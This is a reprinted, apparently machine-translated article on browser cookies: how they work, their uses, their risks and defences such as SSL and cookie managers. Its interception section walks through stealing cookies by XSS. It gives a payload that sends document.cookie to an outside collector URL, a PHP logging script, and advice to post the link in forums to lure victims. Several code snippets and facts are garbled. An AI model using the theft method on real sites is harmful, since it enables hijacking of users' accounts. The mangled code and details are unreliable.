"Reprint" Talk about cookies

0x00 Introduction

In the history of Web technology, the advent of cookie technology is a major change. However, Cookie technology is a very controversial technology, from the date it was born into a vast network of users and web developers of a controversy, not because the function of the cookie is too weak, but that the use of cookies can be harmful to the privacy information of network users.

Cookie technology was first introduced into the Navigator browser by the Netscape company. Later, the Woridwideweb Association supported and adopted the cookie standard, and Microsoft also used cookies in the Internetexpiorer browser. Most browsers now support cookies, or at least the use of cookie technology. Today, almost all web designers use cookie technology. The widespread use of cookies has led to concerns about the security of personal information. Some websites and institutions abuse cookies, without the permission of visitors to collect personal data of others, to build user database, send advertising and other profit purposes, resulting in the disclosure of user privacy information.

In view of this, the system studies the technical characteristics of the cookie and its security issues, the research to prevent cookies from disclosing user privacy information measures, not only to ensure the security of personal information, but also more secure use of cookie technology to serve Internet applications.

0x01 Cookie Technical Analysis

1.1 Cookie definition and its functions

As defined in the official Netscape document, a cookie is a way for a server or script to maintain information on a client computer under the HTTP protocol. In layman's terms, a cookie is a technique that allows Web Web servers to store small amounts of data on a client's hard disk or in memory, or to read data from a client's hard disk. A cookie file is a small text file stored on a browser client computer that is created by a Web server's CGI script when browsing a Web site in the format: User name @ web address [digital].txt.

The cookie file records information about the user, such as identification number ID, password, page visited, time spent, how the user shopped on the Web site, or how many times the user visited the site, and when the user links the Web server again, the browser reads the cookie information and passes it on to the Web site.

Cookie file information fragments are stored as "name/value" pairs (name-vaiuepairs), and a "name/value" Pair is just a named piece of data. For example, if you visit the www.goto.com Web site, the site may generate a cookie file on the client computer that contains the following: userida9a3bece0563982dwww.goto.com/. GoTo.com a single "name/value" pair on the computer, where "name" is the UserID and "value" is a9a3bece0563982d.

The location of the cookie file is closely related to the operating system and browser, which are called Cookie files on Windows machines and are called Magiccookie files in the Macintosh machine. For Windows and Internet Explorer, the cookie file is stored in the following location:

Win9x operating System: C:\windows\cookies;winme operating system: C:\Windows\profiies\ user name \cookies;win2k operating system: C:\Windows\Cookies ; WinXP operating system: C:\DocumentsandSet-tings\ user name \cookies. Win7 above operating system: C:\Users\ user name \appdata\roaming\microsoft\windows\cookies

The primary function of a cookie is to record the user's personal information, and its most fundamental purpose is to help the Web site save information about the visitor. More generally, a cookie is a way to maintain Web application continuity (that is, execution state management).

The HTTP protocol is a stateless, non-connected protocol that cannot maintain continuous state information for a session on the server. With the development of WWW, the stateless nature of HTTP can not meet the needs of some applications, which brings inconvenience to the operation of Web server and client. In this context, the State management mechanism of HTTP is proposed ——— cookie mechanism, which is a supplement to the HTTP protocol to maintain the continuous state of the server and the client.

1.2 Cookie Basic Working principle

Cookies use Httpheader to pass data. The cookie mechanism defines two types of headers: the Set-cookie header and the cookie header. The Set-cookie header is contained in the response header (Responseheader) of the Web server, and the cookie header is contained in the browser client request header (Reguestheader).

The operation of the cookie, the specific analysis is as follows

Operating process diagram of cookies

(1) The client type the URL of the Web server in the address bar of the browser, and the browser sends a request to read the webpage.

(2) When the server receives the request, it generates a Set-cookie header, which is placed in the HTTP message to return the client together and initiates a session.

(3) After the client receives the answer, to continue the session, the contents of the Set-cook-ie are taken out and a Cookie.txt file is stored in the client computer.

(4) When the client makes a request to the server again, the browser first searches the computer for the Cookie.txt file of the Web site. If found, the cookie header is generated based on this Cookie.txt, which is sent to the server in the HTTP request message.

(5) The server receives a request containing a cookie header, retrieves information about the user in its cookie, and generates a page response from a client to be passed to the client. Every Web page request of a browser can pass an existing cookie file, for example, the browser's open or refresh page operation.

0x02 Cookie Application

(1) Implement user authentication in the Web

One of the big drawbacks of the HTTP protocol is that it does not make a user's identity, which is a great inconvenience to programmers, and cookies compensate for this flaw. Most sites in the user identity authentication using a cookie mechanism, so that the user after the first authentication, no need to enter their user account number, password password, etc., this can save the user login cumbersome.

(2) Customizing the personalized Space

Cookie technology facilitates the Web site to customize information for different users, to provide users with a personalized, more user-friendly browsing environment, and to more accurately collect visitor information. For example, to provide users with the right to change the content, layout and color of the Web page, allow users to enter their own information, and then through the information on the site to modify some parameters to customize the appearance of the Web page.

In addition, because of the cost, bandwidth constraints and other reasons, users do not want to visit a site to browse all the content of the Web. Using cookie technology to set columns according to personal preferences, dynamically generate the content users need, so as to cater to different levels of user interest, reduce the number of user project selection, more reasonable use of the Web server transmission bandwidth. (3) Website Access statistics

The use of proxies, caches, and so on, makes it possible to help the site accurately count the number of visitors by creating a unique ID for each visitor. Using cookies, the site can do the following: Determine how many people have visited, how many of the visitors are new, how many are old, and how often a user visits a website.

The basic approach is that, with the help of a background database, when a user first accesses the site, the site establishes a new ID in the database and transmits the ID to the user via a cookie. When the user visits again, the website will add 1 to the counter of the user ID, get the user's visit number or judge whether the user is a new user or an old user.

The following design a program that uses the cookie count, written in ASP, which has the ability to count the user's access to the page:

<%@LANGUAGE=Jscript%><%varcount= "" ;< Span class= "PLN" > count=reguest. Cookies "CountNumber" count = (parseint (count,< Span class= "PLN" >l0) +l). tostringresponse. Cookies ( "CountNumber" count ;%>             

(4) Maintenance of online e-commerce customer information

Online ordering business uses cookie technology to record items that users want to buy. The user stores the item in the "Shopping cart" and the site is recorded in the user's ID record in the database. When a user "pays", the site retrieves all of the user's choices in the database by ID and knows the items in the "Shopping cart". Cookies simplify the operation of ordering, making online shopping closer to real life.

(5) Recording site tracks

When you visit the same Web site again, the cookie has an attribute that is read back. This feature is used to implement many of the design features, such as displaying the number of times a user visits the page, showing the user's last access time, recording the user's previous selections on this page, and so on, which eliminates the need to study complex CGI programming.

0X03 security issues with cookies

Cookies are designed to bring convenience to users, add value to the website, and generally do not pose a serious security threat. A cookie file cannot be executed as code, and it does not transmit a virus, it is proprietary to the user and can only be read by the server that created it. In addition, browsers generally allow only 300 cookies, each with a maximum of 20 cookies, each cookie size limit is 4KB, so the cookie does not fill the hard disk, and will not be used as a "denial of service" attack means.

However, as a substitute for the user's identity, the security of the cookie sometimes determines the security of the whole system, and the security of the cookie cannot be neglected.

(1) Cookie spoofing cookie records information such as the user's account ID, password, and is usually transmitted online using the MD5 method. After the encrypted processing of information even by some people on the network to intercept some ulterior motives can not understand. However, the problem now is that the person intercepting the cookie does not need to know the meaning of these strings, as long as the cookie is submitted to the server, and can be authenticated, it can impersonate the victim's identity to the site, this behavior is called Cookie spoofing.

The illegal user obtains the corresponding encryption key through the cookie deception, thus accesses the legitimate user's personalized information, including the user's e-mail and even the account information, has caused the serious harm to the personal information.

(2) Cookie interception

Cookies are transmitted in plain text between the browser and the server, and are easily intercepted and exploited by others illegally. Any person who can intercept web traffic can read the cookie.

If a cookie is intercepted by an illegal user and then replayed within its validity period, the illegal user will enjoy the rights of the legitimate user. For example, for online reading, illegal users can enjoy reading e-magazines online without paying a fee.

The means of interception of cookies are as follows.

(1) Interception of cookies by means of programming. The following analysis of its methods, the method is completed in two steps. Step One: Locate the website where you want to collect cookies, analyze them, and construct the URLs. First open the site to collect cookies, here is the assumption is http://www.XXX.net, login website input user name "<Al>" (without quotation marks), analysis of the  packet, get the following code:

Http://www.XXX.net/tXl/login/login.pl? Username=<Al>&passwd=&ok. x=28&ok.y=6; 

Replace "<Al>" with:

"<script>alert (document.cookie) </script>" Retry, if execution succeeds, start constructing URL:

Http://www.XXX.net/tXl/login/login.pl? Username=<script>window.  Open ("http://www.cbifamily.org/cbi.php? "%2bdocument.cookie)</script>&passwd=&ok. x=28&ok.y=6.         

Where http://www.cbifamily.org/cbi.php is a script on a host that the user can control. It is important to note that "%2b" is the URL encoding for the symbol "+" because "+" is treated as a space. The URL can be posted in a forum to entice others to click.

Step two: Compile a PHP script that collects cookies and place them on a Web site that the user can control, and then execute the PHP code when an unsuspecting person clicks on the constructed URL. The specific contents of the script are as follows:

<?PHP $info=Getenv（"Ouery_string"）; if ( $info    $fp =fopen ( "Info.tXt" , "a" );  ( $fp ,! Info. " \ n " $fp } header (?>                

By putting this code on the Web, you can collect everyone's cookies. If a forum allows HTML code or allows the use of flash tags, you can use these techniques to collect cookies into the forum, then give the post an appealing theme, write interesting content, and quickly collect a large number of cookies. In the forum, many people's passwords are stolen by this method.

(2) Use flash code hidden trouble to intercept cookies. There is a Geturl () function in Flash. Flash can use this function to automatically open the specified Web page, which may lead the user to a Web site that contains malicious code. For example, when a user appreciates a flash animation on a computer, the code in the animation frame may have been quietly connected to the Internet and opened a tiny page with special code that collects cookies and can do other harmful things. The site cannot suppress this as a flash, as this is the internal function of the Flash file.

(3) Cookie leaks network privacy

The main reasons why cookies cause network privacy leaks are:! Business interests Drive. With the rise of e-commerce and the emergence of great business opportunities on the Internet, some websites and institutions misuse cookies, without the permission of visitors, using search engine technology, data mining technology or even network deception technology to collect other people's personal data, to build user database, send advertising and other profit purposes, Disclosure of personal privacy of users. "The openness of cookie information delivery. The cookie file has a special delivery process and text characteristics, which transmits unsecured cook-ie files between the server and the client, which can easily lead to the disclosure of personal information.

0X04 security measures to protect against cookie leaks

How can cookies be safely applied in the face of cookie security issues?

(1) Strengthen the awareness of safety precautions

Cookies are relatively harmless, but they can be used to track users, and the use of cookies must be aware of their inherent security weaknesses.

The content stored in the cookie is entirely likely to be the personal data of the user. For example, in order to facilitate users, the website uses cookies to store the member's registration information: e-mail address, website user name, user password, credit card number, etc., so that users do not have to re-enter the data when they log in to the site. If someone steals such a cookie file, he can impersonate a login to the site, which poses an unpredictable threat to the security of the user's personal information.

Therefore, only some unimportant data is stored in the cookie, such as user preferences or other information that has no significant impact on the application. If you do need to save some sensitive information in Cook-ie, encrypt it to prevent others from stealing it. You can set the properties of a cookie so that it can only be transferred on a connection that uses Secure Sockets Layer (SSL). SSL does not prevent cookies stored on the user's computer from being read or manipulated by others, but prevents the cookie from being intercepted by others while in transit.

(2) Configuring a secure browser

In the toolbar of IE and Netscape browser, there are setting options that prohibit cookies, and you can set whether a site is prompted when it wants to create a cookie on the user's computer. This allows the user to choose to allow or deny creation of Cook-ie. It is important to note that certain websites must use cookies, which simply prohibit them from viewing such websites.

Using IE6 is more secure. The latest IE6 offers a variety of privacy features, including: View the website's P3P privacy policy to see how the site uses personally identifiable information, and use cookie privacy settings to determine whether cookies on your website are allowed to be stored on your computer, and to issue a privacy alert when you visit a site that does not meet the privacy setting criteria. Users can selectively set cookies.

(3) Installing the cookie management tool

①cookiecrusher. Limitsoftware Company's crusher applies to Netscape users and features: Manage cookies already on your computer, set up a list of websites that prohibit or allow cookies to be created, warn you when a new cookie is created and modify an existing cookie, Prohibit third-party website cookies, real-time control to accept or reject cookies from the site, record cookie activity logs, edit cookies, etc., and when viewed online, the original analysis function of the program can automatically determine the purpose of the cookie created by the website, such as: To determine whether the site is to use cookies to store user input information or to use cookies to track the user's browsing habits and so on.

②cookiepai. In addition to the browser can use cookies, other Internet software may also be used, such as mail programs. In order to maintain the security of network privacy, but also to ensure that some Internet software to correctly use cookie files, you can install Kooka-burrasoftware Company's support for a variety of software cookie management tool Cookiepai. It is dedicated to cookie management, enabling users to view, delete, edit existing cookies, automatically control whether to accept cookies in real time, filter cookies based on expiration, and to record cookie activity, and to edit a list of websites that refuse or allow cookies.

(4) Delete the in-memory cookies

The cookie information is not stored as a file on the hard disk, and some information is kept in memory. This type of cookie is usually generated by the system automatically in memory when the user accesses certain special websites. Once a visitor leaves the site, the system automatically removes the cookie from memory. To do this, you need to use Registry Editor to modify the system settings, run Regedit and find the following key values:

Hkey_local_machine\software\microsoft\windows\cur-rentversion\internetsettings\cache\speciaipaths\cookies, This is the key value of the cookie in memory and the key value is deleted. Right-click Cook-ies, and then click the Delete command on the shortcut menu to confirm the deletion.

(5) Using AAS technology

In 2002, the United States Ingriannetworks Company published a platform "activeappii-cationsecurity (AAS)" That could protect a Web site from "cookiepoisoning (cookie Tampering)" attacks. The AAS platform encrypts important information inside the cookie and attaches an electronic signature. Each time the Web server communicates with the client, it uses an electronic signature to confirm the contents of the cookie. If a malicious user deletes an electronic signature or changes the content of the message, the electronic signature and the content of the cookie can no longer be matched. At this point, AAS blocks this cookie and refuses to return information to the Web site. In addition, the platform encrypts the cookie content by 3DES, and the decryption requires a password to securely store the cookie in this way. The communication between the WWW server and the client also takes advantage of the SSL connection mode to ensure the security of the communication route. Through the comprehensive use of electronic signature, encryption, SSL connection and other technologies to form a strong security scheme, can eliminate the two aspects of communication routing and data storage vulnerabilities, to eliminate the alteration of cookies.

0x05 Concluding remarks

A cookie is a small amount of information sent by a Web server that is stored in a client system for future queries. The primary purpose of a cookie is to store information, primarily for the purpose of storing the user's logo and password, and to store the user's preferences for all possible settings. From a programmatic point of view, cookies can be used to solve state management problems.

In fact, if information is not associated with personal information, the cookie is relatively harmless. However, cookies can be used to track users, there are security issues such as cookie spoofing, disclosure of privacy, and can pose a threat to the information security of network users.

Strengthen awareness of prevention, understand the inherent security weaknesses of cookies, configure secure browsers, use cookie management tools, encrypt and transfer cookie data using technologies such as electronic signatures, encryption, and SSL connections to effectively prevent cookies from disclosing user privacy, Protect personal information so that cookies can serve Web applications more securely.

Although the cookie technology is controversial, it will not die out, it needs to study better security technology to its perfection and development. Cookie technology will have greater space for survival and development in the future.

"Reprint" Talk about cookies